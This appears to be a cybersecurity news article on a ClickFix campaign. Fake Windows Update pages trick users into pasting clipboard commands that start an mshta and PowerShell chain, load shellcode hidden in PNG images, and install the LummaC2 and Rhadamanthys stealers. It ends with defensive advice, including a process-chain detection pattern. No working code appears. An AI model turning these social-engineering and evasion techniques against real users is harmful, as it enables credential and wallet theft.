A new wave of cyberattacks is tricking Windows users into installing malware through highly realistic, full-screen browser pages that mimic Microsoft’s official update interface, according to researchers who say the campaign marks a significant evolution of a dangerous social-engineering technique known as ClickFix.
The attacks, observed since early October, rely on convincing victims to manually paste attacker-controlled commands into the Windows Command Prompt—a maneuver that bypasses many security controls and gives hackers direct execution capabilities on the system.
A Realistic Update Screen That’s Pure Deception
In this latest iteration, attackers display an animated Windows Update screen that fills the entire browser window, instructing victims to “complete installation” by pressing specific key sequences. JavaScript embedded within the page silently copies malicious code into the user’s clipboard; when the user pastes it into Command Prompt—as instructed—the malware executes.
Algoritha Prepares You for Seamless DPDP Compliance — Contact Us for Complete Implementation Support
“With the fake update screen, the attacker blends social engineering and technical execution in a way that’s nearly indistinguishable from a legitimate Windows process,” said researchers at the cybersecurity firm Huntress, which analyzed the campaign.
In another variant, attackers use a “human verification” page that similarly convinces the user to run malicious commands.
Steganography Hides Malware in Images
A key advancement in the new ClickFix wave is the deployment of steganography—encoding the final malware payload inside what appear to be harmless PNG images. Rather than adding data at the end of a file, the malicious code is inserted directly into pixel color channels, where it is later reconstructed in memory.
The steganographic payloads are decrypted using a .NET “Stego Loader” that retrieves an AES-encrypted blob from its own manifest resources. The resulting shellcode is hidden until executed.
Once unpacked, researchers found that attackers were delivering two well-known information-stealing tools: LummaC2 and Rhadamanthys, both capable of harvesting browser data, cryptocurrency wallets, authentication tokens and system credentials.
A Multi-Stage Chain Designed for Evasion
The attack chain begins with mshta.exe, a native Windows binary frequently abused for malicious JavaScript execution. Multiple stages follow, involving PowerShell scripts, a custom loader and shellcode reconstructed from the PNG file.
Huntress identified an evasion mechanism called ctrampoline, in which the malware’s entry-point function calls 10,000 empty functions in a chain, making static analysis significantly more difficult for automated scanners.
A visual map published by Huntress shows the attack’s complexity—beginning with a seemingly simple browser prompt and culminating in fully covert in-memory execution.
Infrastructure Impacted by Operation Endgame
Researchers noted that a Windows Update–themed Rhadamanthys campaign was active as recently as early October. However, after Operation Endgame, a multinational law enforcement effort that disrupted several malware distribution networks on November 13, the payloads appear to have stopped being delivered—though the phishing domains remain online.
The lingering infrastructure suggests that operators may be regrouping or preparing to infect new victims once updated payloads are ready.
How Users and Analysts Can Protect Themselves
Experts warn that the new variant is especially effective because it weaponizes trust in familiar system prompts.
Huntress recommends:
-
Disabling the Windows Run dialog for non-technical users
-
Monitoring for explorer.exe → mshta.exe → powershell.exe process chains
-
Reviewing the RunMRU registry key for suspicious user-entered commands
-
Training users to avoid entering commands supplied by unknown websites
-
Treating any full-screen browser “Windows Update” page as suspicious
The attack underscores a broader trend: as operating systems harden their defenses, attackers increasingly rely on social-engineering tricks that make users execute the malware themselves—unknowingly turning human behavior into the weakest link.
